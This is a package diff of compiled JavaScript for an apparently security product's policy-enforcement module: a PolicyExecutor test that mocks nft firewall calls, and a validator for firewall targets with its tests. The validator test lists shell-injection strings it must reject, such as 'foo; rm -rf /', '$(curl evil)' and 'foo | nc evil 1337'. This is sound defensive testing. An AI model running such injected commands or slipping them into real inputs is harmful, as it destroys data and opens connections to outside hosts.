;QACf,CAAC;QAED,IAAI,OAAO,GAAG,KAAK,CAAC;QACpB,OAAO,IAAI,EAAE,CAAC;YACZ,IAAI,CAAC;gBACH,IAAA,4BAAY,EAAC,IAAI,CAAC,WAAW,EAAE,CAAC,IAAI,EAAE,QAAQ,EAAE,IAAI,EAAE,MAAM,EAAE,IAAI,EAAE,MAAM,CAAC,EAAE;oBAC3E,OAAO,EAAE,IAAI;oBACb,KAAK,EAAE,QAAQ;iBAChB,CAAC,CAAC;gBACH,OAAO,GAAG,IAAI,CAAC;YACjB,CAAC;YAAC,MAAM,CAAC;gBACP,MAAM;YACR,CAAC;QACH,CAAC;QAED,OAAO,OAAO,CAAC;IACjB,CAAC;IAEO,cAAc,CAAC,MAAc;QACnC,IAAI,CAAC,IAAI,CAAC,MAAM,EAAE,CAAC;YACjB,OAAO,CAAC,CAAC;QACX,CAAC;QAED,IAAI,CAAC;YACH,MAAM,MAAM,GAAG,IAAA,4BAAY,EAAC,IAAI,CAAC,MAAM,EAAE,CAAC,IAAI,EAAE,MAAM,EAAE,OAAO,EAAE,MAAM,EAAE,QAAQ,EAAE,QAAQ,CAAC,EAAE;gBAC5F,QAAQ,EAAE,MAAM;gBAChB,OAAO,EAAE,IAAI;aACd,CAAC,CAAC;YAEH,MAAM,OAAO,GAAG,MAAM;iBACnB,KAAK,CAAC,IAAI,CAAC;iBACX,GAAG,CAAC,CAAC,IAAI,EAAE,EAAE;gBACZ,IAAI,CAAC,IAAI,CAAC,QAAQ,CAAC,YAAY,MAAM,GAAG,CAAC,EAAE,CAAC;oBAC1C,OAAO,IAAI,CAAC;gBACd,CAAC;gBACD,OAAO,IAAI,CAAC,KAAK,CAAC,gBAAgB,CAAC,EAAE,CAAC,CAAC,CAAC,IAAI,IAAI,CAAC;YACnD,CAAC,CAAC;iBACD,MAAM,CAAC,CAAC,MAAM,EAAoB,EAAE,CAAC,OAAO,CAAC,MAAM,CAAC,CAAC,CAAC;YAEzD,KAAK,MAAM,MAAM,IAAI,OAAO,EAAE,CAAC;gBAC7B,IAAA,4BAAY,EAAC,IAAI,CAAC,MAAM,EAAE,CAAC,QAAQ,EAAE,MAAM,EAAE,MAAM,EAAE,QAAQ,EAAE,QAAQ,EAAE,QAAQ,EAAE,MAAM,CAAC,EAAE;oBAC1F,OAAO,EAAE,IAAI;oBACb,KAAK,EAAE,QAAQ;iBAChB,CAAC,CAAC;YACL,CAAC;YAED,OAAO,OAAO,CAAC,MAAM,CAAC;QACxB,CAAC;QAAC,MAAM,CAAC;YACP,OAAO,CAAC,CAAC;QACX,CAAC;IACH,CAAC;CACF;AAjUD,wCAiUC"}
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"policy-executor.test.d.ts","sourceRoot":"","sources":["../../src/enforcement/policy-executor.test.ts"],"names":[],"mappings":""}
|
|
@@ -0,0 +1,46 @@
|
|
|
1
|
+
"use strict";
|
|
2
|
+
Object.defineProperty(exports, "__esModule", { value: true });
|
|
3
|
+
const vitest_1 = require("vitest");
|
|
4
|
+
const { mockExecFileSync } = vitest_1.vi.hoisted(() => ({
|
|
5
|
+
mockExecFileSync: vitest_1.vi.fn(),
|
|
6
|
+
}));
|
|
7
|
+
vitest_1.vi.mock('child_process', () => ({
|
|
8
|
+
execFileSync: mockExecFileSync,
|
|
9
|
+
}));
|
|
10
|
+
const policy_executor_1 = require("./policy-executor");
|
|
11
|
+
(0, vitest_1.describe)('PolicyExecutor', () => {
|
|
12
|
+
(0, vitest_1.beforeEach)(() => {
|
|
13
|
+
vitest_1.vi.clearAllMocks();
|
|
14
|
+
mockExecFileSync.mockImplementation((_bin, args) => {
|
|
15
|
+
if (args[0] === '--version')
|
|
16
|
+
return '';
|
|
17
|
+
if (args[0] === 'add' && args[1] === 'rule')
|
|
18
|
+
return '';
|
|
19
|
+
if (args[0] === '-a' && args[1] === 'list') {
|
|
20
|
+
return 'table inet filter {\n chain output {\n ip daddr 203.0.113.10 drop comment "policy-1" # handle 17\n }\n}\n';
|
|
21
|
+
}
|
|
22
|
+
if (args[0] === 'delete' && args[1] === 'rule')
|
|
23
|
+
return '';
|
|
24
|
+
if (args[0] === '-C' || args[0] === '-A' || args[0] === '-D')
|
|
25
|
+
return '';
|
|
26
|
+
return '';
|
|
27
|
+
});
|
|
28
|
+
});
|
|
29
|
+
(0, vitest_1.it)('removes nft rules when a synced policy is deleted', async () => {
|
|
30
|
+
const executor = new policy_executor_1.PolicyExecutor({ sentry: { hostId: 'host-1' } });
|
|
31
|
+
await executor.apply([
|
|
32
|
+
{
|
|
33
|
+
id: 'policy-1',
|
|
34
|
+
hostId: null,
|
|
35
|
+
type: 'block_domain',
|
|
36
|
+
target: '203.0.113.10',
|
|
37
|
+
enabled: true,
|
|
38
|
+
action: 'deny',
|
|
39
|
+
description: '',
|
|
40
|
+
},
|
|
41
|
+
], []);
|
|
42
|
+
await executor.apply([], []);
|
|
43
|
+
(0, vitest_1.expect)(mockExecFileSync).toHaveBeenCalledWith(vitest_1.expect.stringContaining('/nft'), ['delete', 'rule', 'inet', 'filter', 'output', 'handle', '17'], vitest_1.expect.any(Object));
|
|
44
|
+
});
|
|
45
|
+
});
|
|
46
|
+
//# sourceMappingURL=policy-executor.test.js.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"policy-executor.test.js","sourceRoot":"","sources":["../../src/enforcement/policy-executor.test.ts"],"names":[],"mappings":";;AAAA,mCAA8D;AAE9D,MAAM,EAAE,gBAAgB,EAAE,GAAG,WAAE,CAAC,OAAO,CAAC,GAAG,EAAE,CAAC,CAAC;IAC7C,gBAAgB,EAAE,WAAE,CAAC,EAAE,EAAE;CAC1B,CAAC,CAAC,CAAC;AAEJ,WAAE,CAAC,IAAI,CAAC,eAAe,EAAE,GAAG,EAAE,CAAC,CAAC;IAC9B,YAAY,EAAE,gBAAgB;CAC/B,CAAC,CAAC,CAAC;AAEJ,uDAAmD;AAEnD,IAAA,iBAAQ,EAAC,gBAAgB,EAAE,GAAG,EAAE;IAC9B,IAAA,mBAAU,EAAC,GAAG,EAAE;QACd,WAAE,CAAC,aAAa,EAAE,CAAC;QACnB,gBAAgB,CAAC,kBAAkB,CAAC,CAAC,IAAY,EAAE,IAAc,EAAE,EAAE;YACnE,IAAI,IAAI,CAAC,CAAC,CAAC,KAAK,WAAW;gBAAE,OAAO,EAAE,CAAC;YACvC,IAAI,IAAI,CAAC,CAAC,CAAC,KAAK,KAAK,IAAI,IAAI,CAAC,CAAC,CAAC,KAAK,MAAM;gBAAE,OAAO,EAAE,CAAC;YACvD,IAAI,IAAI,CAAC,CAAC,CAAC,KAAK,IAAI,IAAI,IAAI,CAAC,CAAC,CAAC,KAAK,MAAM,EAAE,CAAC;gBAC3C,OAAO,gHAAgH,CAAC;YAC1H,CAAC;YACD,IAAI,IAAI,CAAC,CAAC,CAAC,KAAK,QAAQ,IAAI,IAAI,CAAC,CAAC,CAAC,KAAK,MAAM;gBAAE,OAAO,EAAE,CAAC;YAC1D,IAAI,IAAI,CAAC,CAAC,CAAC,KAAK,IAAI,IAAI,IAAI,CAAC,CAAC,CAAC,KAAK,IAAI,IAAI,IAAI,CAAC,CAAC,CAAC,KAAK,IAAI;gBAAE,OAAO,EAAE,CAAC;YACxE,OAAO,EAAE,CAAC;QACZ,CAAC,CAAC,CAAC;IACL,CAAC,CAAC,CAAC;IAEH,IAAA,WAAE,EAAC,mDAAmD,EAAE,KAAK,IAAI,EAAE;QACjE,MAAM,QAAQ,GAAG,IAAI,gCAAc,CAAC,EAAE,MAAM,EAAE,EAAE,MAAM,EAAE,QAAQ,EAAE,EAAW,CAAC,CAAC;QAE/E,MAAM,QAAQ,CAAC,KAAK,CAAC;YACnB;gBACE,EAAE,EAAE,UAAU;gBACd,MAAM,EAAE,IAAI;gBACZ,IAAI,EAAE,cAAc;gBACpB,MAAM,EAAE,cAAc;gBACtB,OAAO,EAAE,IAAI;gBACb,MAAM,EAAE,MAAM;gBACd,WAAW,EAAE,EAAE;aAChB;SACF,EAAE,EAAE,CAAC,CAAC;QAEP,MAAM,QAAQ,CAAC,KAAK,CAAC,EAAE,EAAE,EAAE,CAAC,CAAC;QAE7B,IAAA,eAAM,EAAC,gBAAgB,CAAC,CAAC,oBAAoB,CAC3C,eAAM,CAAC,gBAAgB,CAAC,MAAM,CAAC,EAC/B,CAAC,QAAQ,EAAE,MAAM,EAAE,MAAM,EAAE,QAAQ,EAAE,QAAQ,EAAE,QAAQ,EAAE,IAAI,CAAC,EAC9D,eAAM,CAAC,GAAG,CAAC,MAAM,CAAC,CACnB,CAAC;IACJ,CAAC,CAAC,CAAC;AACL,CAAC,CAAC,CAAC"}
|
|
@@ -0,0 +1,37 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Strict validator for policy `target` strings that flow from the NeuroSec
|
|
3
|
+
* cloud into shell-executing code paths (iptables/nft/process.kill).
|
|
4
|
+
*
|
|
5
|
+
* Design intent: targets are NEVER interpolated into shell strings without
|
|
6
|
+
* passing this validator first. Any rejected target is logged and dropped —
|
|
7
|
+
* we fail closed rather than risk injection.
|
|
8
|
+
*
|
|
9
|
+
* Accepted forms:
|
|
10
|
+
* - hostname: foo.example.com (RFC 1123, max 253 chars, no whitespace)
|
|
11
|
+
* - wildcard: *.example.com
|
|
12
|
+
* - IPv4: 203.0.113.42
|
|
13
|
+
* - IPv4 CIDR: 10.0.0.0/8
|
|
14
|
+
* - IPv6: 2001:db8::1
|
|
15
|
+
* - IPv6 CIDR: 2001:db8::/32
|
|
16
|
+
* - pid spec: pid:12345
|
|
17
|
+
* - framework id: lowercase + digits + dash, 1-64 chars (e.g. "claude-code")
|
|
18
|
+
*
|
|
19
|
+
* Rejected:
|
|
20
|
+
* - shell metacharacters: ; | & $ ` < > ( ) " ' \ newline tab
|
|
21
|
+
* - leading dashes (could be parsed as a flag by iptables)
|
|
22
|
+
* - any value containing whitespace
|
|
23
|
+
*/
|
|
24
|
+
export type TargetKind = 'hostname' | 'wildcard' | 'ipv4' | 'ipv4-cidr' | 'ipv6' | 'ipv6-cidr' | 'pid' | 'framework' | 'invalid';
|
|
25
|
+
export interface ValidatedTarget {
|
|
26
|
+
kind: TargetKind;
|
|
27
|
+
value: string;
|
|
28
|
+
pid?: number;
|
|
29
|
+
}
|
|
30
|
+
/**
|
|
31
|
+
* Classify and validate a target. Returns `invalid` for anything that should
|
|
32
|
+
* never be interpolated into a shell command.
|
|
33
|
+
*/
|
|
34
|
+
export declare function validateTarget(raw: unknown): ValidatedTarget;
|
|
35
|
+
/** Returns true if the target is safe to use as an iptables/nft destination. */
|
|
36
|
+
export declare function isNetworkTarget(t: ValidatedTarget): boolean;
|
|
37
|
+
//# sourceMappingURL=target-validator.d.ts.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"target-validator.d.ts","sourceRoot":"","sources":["../../src/enforcement/target-validator.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;;;;;;;;GAsBG;AAaH,MAAM,MAAM,UAAU,GAAG,UAAU,GAAG,UAAU,GAAG,MAAM,GAAG,WAAW,GAAG,MAAM,GAAG,WAAW,GAAG,KAAK,GAAG,WAAW,GAAG,SAAS,CAAC;AAEjI,MAAM,WAAW,eAAe;IAC9B,IAAI,EAAE,UAAU,CAAC;IACjB,KAAK,EAAE,MAAM,CAAC;IACd,GAAG,CAAC,EAAE,MAAM,CAAC;CACd;AAsBD;;;GAGG;AACH,wBAAgB,cAAc,CAAC,GAAG,EAAE,OAAO,GAAG,eAAe,CAuC5D;AAED,gFAAgF;AAChF,wBAAgB,eAAe,CAAC,CAAC,EAAE,eAAe,GAAG,OAAO,CAO3D"}
|
|
Binary file
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"target-validator.js","sourceRoot":"","sources":["../../src/enforcement/target-validator.ts"],"names":[],"mappings":"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"}
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"target-validator.test.d.ts","sourceRoot":"","sources":["../../src/enforcement/target-validator.test.ts"],"names":[],"mappings":""}
|
|
@@ -0,0 +1,103 @@
|
|
|
1
|
+
"use strict";
|
|
2
|
+
Object.defineProperty(exports, "__esModule", { value: true });
|
|
3
|
+
const vitest_1 = require("vitest");
|
|
4
|
+
const target_validator_1 = require("./target-validator");
|
|
5
|
+
(0, vitest_1.describe)('target-validator / validateTarget', () => {
|
|
6
|
+
(0, vitest_1.describe)('accepts', () => {
|
|
7
|
+
(0, vitest_1.it)('plain hostnames', () => {
|
|
8
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('api.openai.com').kind).toBe('hostname');
|
|
9
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('a.b.c.example.co.uk').kind).toBe('hostname');
|
|
10
|
+
});
|
|
11
|
+
(0, vitest_1.it)('wildcard hostnames', () => {
|
|
12
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('*.openai.com').kind).toBe('wildcard');
|
|
13
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('*.a.b').kind).toBe('wildcard');
|
|
14
|
+
});
|
|
15
|
+
(0, vitest_1.it)('IPv4 and IPv4 CIDR', () => {
|
|
16
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('203.0.113.42').kind).toBe('ipv4');
|
|
17
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('10.0.0.0/8').kind).toBe('ipv4-cidr');
|
|
18
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('255.255.255.255').kind).toBe('ipv4');
|
|
19
|
+
});
|
|
20
|
+
(0, vitest_1.it)('IPv6 and IPv6 CIDR', () => {
|
|
21
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('2001:db8::1').kind).toBe('ipv6');
|
|
22
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('2001:db8::/32').kind).toBe('ipv6-cidr');
|
|
23
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('::1').kind).toBe('ipv6');
|
|
24
|
+
});
|
|
25
|
+
(0, vitest_1.it)('pid spec', () => {
|
|
26
|
+
const r = (0, target_validator_1.validateTarget)('pid:12345');
|
|
27
|
+
(0, vitest_1.expect)(r.kind).toBe('pid');
|
|
28
|
+
(0, vitest_1.expect)(r.pid).toBe(12345);
|
|
29
|
+
});
|
|
30
|
+
(0, vitest_1.it)('framework ids', () => {
|
|
31
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('claude-code').kind).toBe('framework');
|
|
32
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('langchain').kind).toBe('framework');
|
|
33
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('opencode').kind).toBe('framework');
|
|
34
|
+
});
|
|
35
|
+
});
|
|
36
|
+
(0, vitest_1.describe)('rejects (injection attempts)', () => {
|
|
37
|
+
const injections = [
|
|
38
|
+
'foo; rm -rf /',
|
|
39
|
+
'127.0.0.1 && curl evil',
|
|
40
|
+
'$(curl evil)',
|
|
41
|
+
'`whoami`',
|
|
42
|
+
'foo | nc evil 1337',
|
|
43
|
+
'foo > /etc/passwd',
|
|
44
|
+
'foo\nrm -rf /',
|
|
45
|
+
'foo\trm -rf /',
|
|
46
|
+
'-d evil', // could be parsed as a flag
|
|
47
|
+
'--match', // long flag
|
|
48
|
+
'\'foo\'',
|
|
49
|
+
'"foo"',
|
|
50
|
+
'foo\\bar',
|
|
51
|
+
'foo bar', // bare whitespace
|
|
52
|
+
'', // empty
|
|
53
|
+
' '.repeat(10), // pure whitespace
|
|
54
|
+
'a'.repeat(257), // too long
|
|
55
|
+
];
|
|
56
|
+
for (const s of injections) {
|
|
57
|
+
(0, vitest_1.it)(`rejects ${JSON.stringify(s).slice(0, 60)}`, () => {
|
|
58
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)(s).kind).toBe('invalid');
|
|
59
|
+
});
|
|
60
|
+
}
|
|
61
|
+
});
|
|
62
|
+
(0, vitest_1.describe)('rejects malformed', () => {
|
|
63
|
+
(0, vitest_1.it)('octet > 255', () => {
|
|
64
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('256.0.0.1').kind).toBe('invalid');
|
|
65
|
+
});
|
|
66
|
+
(0, vitest_1.it)('CIDR mask out of range', () => {
|
|
67
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('10.0.0.0/33').kind).toBe('invalid');
|
|
68
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('::1/129').kind).toBe('invalid');
|
|
69
|
+
});
|
|
70
|
+
(0, vitest_1.it)('pid 0 or negative', () => {
|
|
71
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('pid:0').kind).toBe('invalid');
|
|
72
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('pid:-1').kind).toBe('invalid');
|
|
73
|
+
});
|
|
74
|
+
(0, vitest_1.it)('hostname with bad chars', () => {
|
|
75
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('foo_bar.com').kind).toBe('invalid'); // underscore not allowed
|
|
76
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('.foo.com').kind).toBe('invalid'); // leading dot
|
|
77
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('foo.com.').kind).toBe('invalid'); // trailing dot
|
|
78
|
+
});
|
|
79
|
+
(0, vitest_1.it)('wildcard with multiple stars', () => {
|
|
80
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)('*.*.foo.com').kind).toBe('invalid');
|
|
81
|
+
});
|
|
82
|
+
(0, vitest_1.it)('non-string input', () => {
|
|
83
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)(123).kind).toBe('invalid');
|
|
84
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)(null).kind).toBe('invalid');
|
|
85
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)(undefined).kind).toBe('invalid');
|
|
86
|
+
(0, vitest_1.expect)((0, target_validator_1.validateTarget)({}).kind).toBe('invalid');
|
|
87
|
+
});
|
|
88
|
+
});
|
|
89
|
+
(0, vitest_1.describe)('isNetworkTarget', () => {
|
|
90
|
+
(0, vitest_1.it)('accepts hostnames, wildcards, IPs, CIDRs', () => {
|
|
91
|
+
(0, vitest_1.expect)((0, target_validator_1.isNetworkTarget)((0, target_validator_1.validateTarget)('api.openai.com'))).toBe(true);
|
|
92
|
+
(0, vitest_1.expect)((0, target_validator_1.isNetworkTarget)((0, target_validator_1.validateTarget)('*.openai.com'))).toBe(true);
|
|
93
|
+
(0, vitest_1.expect)((0, target_validator_1.isNetworkTarget)((0, target_validator_1.validateTarget)('10.0.0.1'))).toBe(true);
|
|
94
|
+
(0, vitest_1.expect)((0, target_validator_1.isNetworkTarget)((0, target_validator_1.validateTarget)('10.0.0.0/8'))).toBe(true);
|
|
95
|
+
});
|
|
96
|
+
(0, vitest_1.it)('rejects pids, frameworks, invalid', () => {
|
|
97
|
+
(0, vitest_1.expect)((0, target_validator_1.isNetworkTarget)((0, target_validator_1.validateTarget)('pid:1234'))).toBe(false);
|
|
98
|
+
(0, vitest_1.expect)((0, target_validator_1.isNetworkTarget)((0, target_validator_1.validateTarget)('claude-code'))).toBe(false);
|
|
99
|
+
(0, vitest_1.expect)((0, target_validator_1.isNetworkTarget)((0, target_validator_1.validateTarget)('foo;rm'))).toBe(false);
|
|
100
|
+
});
|
|
101
|
+
});
|
|
102
|
+
});
|
|
103
|
+
//# sourceMappingURL=target-validator.test.js.map
|